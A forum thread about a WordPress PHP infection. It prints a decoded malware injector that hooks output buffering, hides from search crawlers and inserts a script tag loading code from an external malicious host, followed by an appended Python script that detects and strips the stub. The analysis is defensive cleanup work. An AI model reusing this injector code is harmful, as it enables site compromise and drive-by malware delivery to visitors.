Anyone know a WordPress plugin to automatically delete dodgy script in PHP files

Discussion in 'PHP' started by ozziememz, Aug 8, 2010.

  1. #1
    I've got this bastard of a virus code in my PHP files

    <?php /**/ eval(base64_decode("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"));?>
     
    ozziememz, Aug 8, 2010
  2. danx10
    #2
    Decoded (comments added to explain each part; the code itself is unchanged):

    <?php
      // Runs once per request (guarded by $GLOBALS['mr_no']) and only where output buffering is available.
      if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
          $GLOBALS['mr_no'] = 1;
          if (!function_exists('mrobh')) {
              if (!function_exists('gml')) {
                  // Returns the injected <script> tag, but only to visitors whose User-Agent is not a
                  // Google or Yahoo crawler, so the infection is less likely to show up in search results.
                  function gml()
                  {
                      if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
                          return '<script src="http://onlineisdudescars.com/co.php"></script>';
                      }
                      return "";
                  }
              }
              if (!function_exists('gzdecode')) {
                  // Fallback gzdecode for PHP builds without one: reads the gzip header flag byte (offset 3)
                  // and skips the optional FEXTRA (4), FNAME (8), FCOMMENT (16) and FHCRC (2) fields to find
                  // the start of the raw deflate stream, so the hook can still inject into compressed output.
                  function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
                  {
                      $R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr($R5A9CF1B497502ACA23C8F611A564684C, 3, 1));
                      $RBE4C4D037E939226F65812885A53DAD9 = 10;
                      $RA3D52E52A48936CDE0F5356BB08652F2 = 0;
                      if ($R30B2AB8DC1496D06B230A71D8962AF5D & 4) {
                          $R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack('v', substr($R5A9CF1B497502ACA23C8F611A564684C, 10, 2));
                          $R63BEDE6B19266D4EFEAD07A4D91E29EB = $R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                          $RBE4C4D037E939226F65812885A53DAD9 += 2 + $R63BEDE6B19266D4EFEAD07A4D91E29EB;
                      }
                      if ($R30B2AB8DC1496D06B230A71D8962AF5D & 8) {
                          $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                      }
                      if ($R30B2AB8DC1496D06B230A71D8962AF5D & 16) {
                          $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                      }
                      if ($R30B2AB8DC1496D06B230A71D8962AF5D & 2) {
                          $RBE4C4D037E939226F65812885A53DAD9 += 2;
                      }
                      // If inflating fails the input is returned untouched, so plain HTML passes through as-is.
                      $R034AE2AB94F99CC81B389A1822DA3353 = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C, $RBE4C4D037E939226F65812885A53DAD9));
                      if ($R034AE2AB94F99CC81B389A1822DA3353 === false) {
                          $R034AE2AB94F99CC81B389A1822DA3353 = $R5A9CF1B497502ACA23C8F611A564684C;
                      }
                      return $R034AE2AB94F99CC81B389A1822DA3353;
                  }
              }
              // Output-buffer callback: tells the browser the body is not compressed, decompresses the
              // buffered page if it was, and inserts gml()'s script tag just before </body>
              // (or appends it when the page has no </body>).
              function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
              {
                  header('Content-Encoding: none');
                  $RA179ABD3A7B9E28C369F7B59C51B81DE = gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
                  if (preg_match('/\<\/body/si', $RA179ABD3A7B9E28C369F7B59C51B81DE)) {
                      return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $RA179ABD3A7B9E28C369F7B59C51B81DE);
                  } else {
                      return $RA179ABD3A7B9E28C369F7B59C51B81DE . gml();
                  }
              }
              // Register the callback so every page rendered through this file passes through mrobh().
              ob_start('mrobh');
          }
      }
    ?>
    Looks like it checks that the visitor is not a bot, then embeds the following file in your page: hxxp://onlineisdudescars.com/co.php

    If you'd like to know what the above file does, to save anyone directly browsing the above file (which could be potentially harmful), you can view the source remotely:

    htt://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fonlineisdudescars.com%2Fco.php

    If you look at the above source, it redirects you to:

    hxxp://www4.my-shield32.co.cc/?p=p52dcWplbnCHnc3KbmNToKV1iqHWnG3MXsaYk2mdZJuexw%3D%3D

    Which is a form of malware: http://en.wikipedia.org/wiki/Rogue_security_software

    *All harmful URLs are replaced with hxxp to prevent damage to users' computers.

    ---------------------------------------------
    Advice to the OP:

    1. Download Malwarebytes' Anti-Malware (free version)

    2. Double click the downloaded file to install the application on your computer.

    3. Once the application is installed, double click on the Malwarebytes' Anti-Malware icon to start the program.

    4. When the application is open, select Scan and the application will guide you through the remaining steps.

    Once the scan is done, save the log (text file) and include it in your next reply or PM me for analysis.
     
    Last edited: Aug 8, 2010
    danx10, Aug 8, 2010
  3. extremephp
    #3
    This is the decoded code!! Well, purely an attack or malware working on!! Clean it up or end up wrecked!

    ~Exp~
     
    extremephp, Aug 8, 2010
  4. ozziememz
    #4
    Yeah, it's a mean one. It's in all my PHP files. I've deleted all the ones from my WordPress dashboard; I just need to delete it from the server PHP files. I can't get into them because the other guy I work with (more technical) is on holiday and he has all the login details.

    Anyone have any advice??
     
    ozziememz, Aug 8, 2010
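One way to do the cleanup the OP is asking about, once someone has shell or FTP access to the server, as an added example that is not from this thread: a Python script that walks a directory of .php files, finds the one-line `<?php /**/ eval(base64_decode("..."));?>` stub shown in post #1, base64-decodes the payload so it can be reviewed, flags the indicators from danx10's decoded sample (ob_start, googlebot, gzdecode, </body, <script src=), then strips the stub and keeps a .bak copy of every file it touches. The regex, the file names and the payload in the demo are constructed for illustration; the real payload was removed from the post, so the demo uses a harmless stand-in of the same shape. Removing the stub does not close whatever hole was used to write it (stolen FTP credentials, an outdated plugin, writable files), so the stripped files still need to be compared against a clean copy and the credentials rotated.

```python
"""Find, decode and strip the `<?php /**/ eval(base64_decode("..."));?>` stub from PHP files.

Added example (not the thread's code): scans a tree of .php files, decodes each stub's base64
payload for review, flags the indicators seen in the decoded sample, and removes the stub,
keeping a .bak copy of every file it modifies.
"""
import base64
import os
import re
import shutil
import tempfile

# One-line injection shape from the thread: optional /**/ comment, then eval(base64_decode("...")).
STUB_RE = re.compile(
    r'<\?php\s*(?:/\*.*?\*/\s*)?eval\s*\(\s*base64_decode\s*\(\s*'
    r'["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*;\s*\?>',
    re.DOTALL,
)
# Same match plus its trailing newline, so removing a stub at line 1 leaves no blank line
# in front of the file's real `<?php` (stray output there breaks later header() calls).
STUB_LINE_RE = re.compile(STUB_RE.pattern + r"[ \t]*\r?\n?", re.DOTALL)

# Strings in the decoded payload that match the ob_start/gml injector decoded in post #2.
INDICATORS = ("ob_start", "googlebot", "gzdecode", "</body", "<script src=")


def decode_payload(b64):
    """Return the decoded payload as text, or None if the argument is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def analyse_file(path):
    """Return [(decoded_payload, [indicators hit]), ...] for every stub found in path."""
    with open(path, encoding="latin-1") as fh:
        content = fh.read()
    findings = []
    for match in STUB_RE.finditer(content):
        payload = decode_payload(match.group(1))
        hits = [ind for ind in INDICATORS if payload is not None and ind in payload]
        findings.append((payload, hits))
    return findings


def clean_file(path):
    """Strip every stub from path (after copying it to path + '.bak'); return the count removed."""
    with open(path, encoding="latin-1") as fh:
        content = fh.read()
    cleaned, removed = STUB_LINE_RE.subn("", content)
    if removed:
        shutil.copy2(path, path + ".bak")
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(cleaned)
    return removed


def scan_tree(root, clean=False):
    """Walk root for .php files; return {path: findings} for infected ones, cleaning them if asked."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            findings = analyse_file(path)
            if findings:
                report[path] = findings
                if clean:
                    clean_file(path)
    return report


def demo():
    """Constructed sample: one infected and one clean file in a temp dir. Returns (before, after, cleaned_text)."""
    # Stand-in payload with the same shape as the thread's (the real one was removed from the post).
    fake_payload = b'if (function_exists("ob_start")) { ob_start("mrobh"); } // skips googlebot'
    stub = '<?php /**/ eval(base64_decode("%s"));?>' % base64.b64encode(fake_payload).decode("ascii")
    root = tempfile.mkdtemp()
    try:
        infected = os.path.join(root, "wp-config.php")
        with open(infected, "w", encoding="latin-1") as fh:
            fh.write(stub + "\n<?php\n// site config\n$table_prefix = 'wp_';\n")
        with open(os.path.join(root, "index.php"), "w", encoding="latin-1") as fh:
            fh.write("<?php\nrequire 'wp-blog-header.php';\n")
        before = scan_tree(root)             # report only
        scan_tree(root, clean=True)          # strip stubs, leave .bak copies behind
        after = scan_tree(root)
        with open(infected, encoding="latin-1") as fh:
            cleaned = fh.read()
    finally:
        shutil.rmtree(root)
    return before, after, cleaned


if __name__ == "__main__":
    before, after, cleaned = demo()
    for path, findings in before.items():
        for payload, hits in findings:
            print(path, "indicators:", hits)
    print("infected files after cleaning:", len(after))
    print(cleaned)
```

On a real site run `scan_tree("/path/to/wordpress")` first to see the report, review a decoded payload or two, and only then run it with `clean=True`; the `.bak` copies let you diff what was removed against the live files afterwards.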